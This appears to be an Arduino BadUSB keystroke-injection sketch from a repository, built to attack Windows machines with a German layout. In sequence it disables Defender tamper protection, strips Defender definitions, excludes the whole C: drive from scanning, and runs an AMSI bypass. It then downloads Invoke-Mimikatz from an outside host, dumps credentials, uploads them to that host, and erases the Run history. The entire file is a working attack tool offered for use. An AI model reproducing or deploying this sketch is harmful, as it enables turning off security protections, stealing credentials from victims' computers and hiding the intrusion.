badusb-stick/badusb-stick.ino.disableTamperWorks

174 lines
4.9 KiB
Text

#include <Keyboard.h>
#define KEY_DELAY 50 //delay between keystrokes for slow computers
void disableTampering() {
// Disable tamper protection with the Windows GUI on Windows 10
// Tested on my Lenovo T420 running Windows 10 {VERSION}
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(700);
Keyboard.println("windowsdefender:");
delay(2800);
// Viren- und Bedrohungsschutz
Keyboard.press(KEY_RETURN);
delay(KEY_DELAY);
Keyboard.release(KEY_RETURN);
delay(1200);
// move down to Einstellungen verwalten
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_RETURN);
delay(KEY_DELAY);
Keyboard.release(KEY_RETURN);
delay(1200);
// move down to Manipulationsschutz slider
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(' ');
delay(KEY_DELAY);
Keyboard.release(' ');
delay(1200);
// yes do it with ALT+j
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press('j');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(1000);
// close window with alt f4
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(500);
}
void setup() {
// Keyboard.begin();
Keyboard.begin(KeyboardLayout_de_DE);
//I recommend that you leave a short delay before start while prototyping.
//It will will give you some time to reprogram a board before it starts typing.
delay(15000);
// normal program, only run it once at startup
disableTampering();
// Windows + R
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(700);
// Start cmd as Administrator
Keyboard.println("powershell Start-Process cmd -Verb runAs");
delay(2500);
// press ALT + j to confirm execution as Administrator
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press('j');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(1500);
// If no UAC enabled, we printed j on the console, let's
// initiate a few CTRL+C's to cancel that and get a fresh
// prompt...
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('c');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(200);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('c');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(300);
// Disable Defender; wait a bit longer, because recent only `ershell ...` was printed
Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true");
delay(200);
// Start powershell; wait longer because the OS has to bring another window to foreground
Keyboard.println("powershell");
delay(200);
// Add C: to Defender exclusion list
Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\"");
delay(200);
Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\"");
delay(200);
Keyboard.println("exit");
delay(2500);
// Download and execute mimikatz; then upload result log
Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\"");
// Keyboard.println("IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)");
delay(9000);
// Clear run history
Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
// Keyboard.println("Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue");
delay(400);
// show wlan passwords
// Keyboard.println("netsh wlan show profile key=clear");
// delay(8000);
// exit cmd window
Keyboard.println("exit");
delay(KEY_DELAY);
Keyboard.end();
}
void loop() {
// do nothing in loop() -- or should we restart the computer? or lock it? or delete something?
// or start a fork bomb etc...
}